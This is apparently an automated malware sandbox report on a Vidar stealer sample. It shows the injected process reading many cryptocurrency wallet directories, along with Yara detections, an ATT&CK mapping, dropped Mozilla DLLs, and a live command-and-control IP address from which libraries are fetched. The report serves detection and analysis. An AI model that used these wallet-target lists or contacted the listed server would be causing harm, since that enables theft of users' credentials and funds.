Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2632, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2632, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D6D9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	1_2_19D6D9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CE5910 sqlite3_mprintf,sqlite3_bind_int64,	1_2_19CE5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CBDB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	1_2_19CBDB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C55C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	1_2_19C55C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CBDFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,	1_2_19CBDFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CC1FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_19CC1FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CE51D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_19CE51D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CD9090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,	1_2_19CD9090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CFD3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_19CFD3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CE55B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_19CE55B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D614D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	1_2_19D614D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D6D4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,	1_2_19D6D4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D1D610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_19D1D610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C78970 sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	1_2_19C78970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C54820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,	1_2_19C54820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D24D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	1_2_19D24D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C78CB0 sqlite3_bind_zeroblob,	1_2_19C78CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C70FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	1_2_19C70FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D24140 sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_initialize,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,	1_2_19D24140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CB8200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,	1_2_19CB8200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C98550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,	1_2_19C98550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C78430 sqlite3_bind_int64,	1_2_19C78430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C906E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,	1_2_19C906E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C68680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,	1_2_19C68680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C77810 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	1_2_19C77810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C6B400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,	1_2_19C6B400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D237E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_19D237E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D03770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_19D03770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C9EF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,	1_2_19C9EF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CBE170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_19CBE170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CAE090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	1_2_19CAE090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CAE200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,	1_2_19CAE200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C566C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	1_2_19C566C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CBA6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,	1_2_19CBA6F0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	411 Process Injection	1 Masquerading	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	1 Credentials in Registry	151 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	411 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	4 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	4 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	54 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	HEUR/AGEN.1318542
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\IDHIIJJJKEGI\freebl3.dll	0%	ReversingLabs
C:\ProgramData\IDHIIJJJKEGI\mozglue.dll	0%	ReversingLabs
C:\ProgramData\IDHIIJJJKEGI\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\IDHIIJJJKEGI\nss3.dll	0%	ReversingLabs
C:\ProgramData\IDHIIJJJKEGI\softokn3.dll	0%	ReversingLabs
C:\ProgramData\IDHIIJJJKEGI\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqln[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://95.217.244.99/softokn3.dllcH	0%	Avira URL Cloud	safe
https://95.217.244.99AKFC	0%	Avira URL Cloud	safe
https://www.gstatic.cn/recaptcha/	0%	Avira URL Cloud	safe
https://95.217.244.99/softokn3.dll	0%	Avira URL Cloud	safe
https://95.217.244.9	0%	Avira URL Cloud	safe
https://95.217.244.99/sqln.dll	0%	Avira URL Cloud	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://95.217.244.99/17.244.99/	0%	Avira URL Cloud	safe
https://95.217.244.99/	0%	Avira URL Cloud	safe
https://95.217.244.99/softokn3.dll-H	0%	Avira URL Cloud	safe
https://95.217.244.99/nss3.dll	0%	Avira URL Cloud	safe
https://95.217.244.99	0%	Avira URL Cloud	safe
https://95.217.244.99/vcruntime140.dll	0%	Avira URL Cloud	safe
https://95.217.244.99/msvcp140.dll	0%	Avira URL Cloud	safe
https://recaptcha.net	0%	URL Reputation	safe
https://95.217.244.99/nss3.dlljL	0%	Avira URL Cloud	safe
https://95.217.244.99EGHJ	0%	Avira URL Cloud	safe
https://95.217.244.99/vcruntime140.dllu	0%	Avira URL Cloud	safe
https://95.217.244.99/mozglue.dll	0%	Avira URL Cloud	safe
https://95.217.244.99/B	0%	Avira URL Cloud	safe
https://95.217.244.99/freebl3.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
steamcommunity.com	23.47.27.74	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://95.217.244.99/softokn3.dll	false	Avira URL Cloud: safe	unknown
https://95.217.244.99/sqln.dll	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199677575543	false		high
https://95.217.244.99/	false	Avira URL Cloud: safe	unknown
https://95.217.244.99/nss3.dll	false	Avira URL Cloud: safe	unknown
https://95.217.244.99/vcruntime140.dll	false	Avira URL Cloud: safe	unknown
https://95.217.244.99/msvcp140.dll	false	Avira URL Cloud: safe	unknown
https://95.217.244.99/mozglue.dll	false	Avira URL Cloud: safe	unknown
https://95.217.244.99/freebl3.dll	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	BAAFIJKK.1.dr	false		high
https://duckduckgo.com/ac/?q=	BAAFIJKK.1.dr	false		high
https://95.217.244.99/softokn3.dllcH	RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://95.217.244.99AKFC	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://steamcommunity.com/?subsection=broadcasts	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://steamcommunity.com/profiles/76561199677575543/badges	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=-zPAhzrcAAqx&l=e	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://www.gstatic.cn/recaptcha/	RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://steamcommunity.com/profiles/76561199677575543/inventory/	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://95.217.244.9	RegAsm.exe, 00000001.00000002.2461606471.0000000001530000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=Kg_v7CMM	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.1.dr, mozglue[1].dll.1.dr	false		high
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://mozilla.org0/	nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=BMF068jICwP9&	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
http://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/points/shop/	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BAAFIJKK.1.dr	false		high
https://steamcommunity.com/profiles/76561199677575543Mozilla/5.0	file.exe, 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	BAAFIJKK.1.dr	false		high
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://95.217.244.99/17.244.99/	RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/recaptcha/	RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://95.217.244.99/softokn3.dll-H	RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
